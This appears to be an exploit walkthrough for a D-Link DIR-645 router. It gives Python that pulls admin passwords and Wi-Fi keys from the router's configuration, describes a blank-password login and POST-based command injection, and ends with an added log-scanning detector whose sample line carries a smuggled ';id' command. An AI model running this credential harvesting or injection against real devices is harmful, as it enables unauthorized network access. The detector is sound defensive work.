import re

# query_getcfg() is defined elsewhere in the original post; it fetches the
# named configuration section from the router and returns it as a string.

def attempt_password_find():
    # Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password
    data = query_getcfg("DEVICE.ACCOUNT")
    if not data:
        return False
    res = re.findall("<password>(.*?)</password>", data)
    # re.findall returns a list, so compare its elements (not the list) to the placeholder value
    if len(res) > 0 and "=OoXxGgYy=" not in res:
        return res
    # Did not find it in first attempt
    data = query_getcfg("WIFI")
    if not data:
        return False
    res = re.findall("<key>(.*?)</key>", data)
    if len(res) > 0:
        return res
    # All attempts failed, just going to return and wish best of luck!
    return False
I've got a router here, a D-Link DIR 645, so let's try this vulnerability on it.
We can also get the password with this command line.
To be honest, we can log in with the username "user" and no password on this type of router. So that's it. Let's move on to the next vulnerability. The second bug is that we can execute remote commands using a "POST" request, where the command is placed in the data part of the request. Let's see the code for this part.
First, you need to create a session with the password you just obtained.
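From the defender's side, the two steps above (pulling the DEVICE.ACCOUNT or WIFI configuration section, then sending a POST whose body carries a shell command) leave a recognisable pattern in the router's request log. The following is an added detection example, not code from the original post; it assumes a simplified "src method path status body" log format, and the endpoint paths in the constructed sample lines are placeholders, since the post does not name them.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Config sections the post shows being pulled to harvest credentials (CWE-200).
SENSITIVE_SECTIONS = ("DEVICE.ACCOUNT", "WIFI")
# Characters that suggest a shell command is being smuggled in a POST body
# ('&' is left out because it is the normal form-field separator).
SHELL_META = re.compile(r"[;|`$]")

def classify(line):
    """Return (source_ip, alert_tags) for one 'src method path status body' line."""
    src, method, path, status, body = line.split(" ", 4)
    body = unquote(body)  # decode %3B etc. so encoded metacharacters are not missed
    tags = []
    for section in SENSITIVE_SECTIONS:
        if section in body:
            tags.append("config-harvest:" + section)
    if method == "POST" and SHELL_META.search(body):
        tags.append("shell-metachar")
    return src, tags

def scan(lines):
    """Group alerts by source; a source that both harvests config and then sends
    shell metacharacters matches the two-step chain described in the post."""
    per_src = defaultdict(set)
    for line in lines:
        src, tags = classify(line)
        per_src[src].update(tags)
    report = {}
    for src, tags in per_src.items():
        if not tags:
            continue
        harvested = any(t.startswith("config-harvest") for t in tags)
        report[src] = {"tags": sorted(tags),
                       "full_chain": harvested and "shell-metachar" in tags}
    return report

# Constructed sample log lines (assumed format). The paths are placeholders,
# not the router's real endpoints, which the post does not name.
SAMPLE_LOG = [
    "10.0.0.5 GET /index.html 200 -",
    "10.0.0.9 POST /placeholder-getcfg 200 SERVICES=DEVICE.ACCOUNT",
    "10.0.0.9 POST /placeholder-getcfg 200 SERVICES=WIFI",
    "10.0.0.9 POST /placeholder-cmd 200 dst=127.0.0.1%3Bid",
    "10.0.0.5 POST /placeholder-login 200 username=user&password=",
]

if __name__ == "__main__":
    for src, info in scan(SAMPLE_LOG).items():
        print(src, info)
```

Only 10.0.0.9 is reported, with `full_chain` set, because it both pulled sensitive configuration sections and then posted a body containing an encoded `;`.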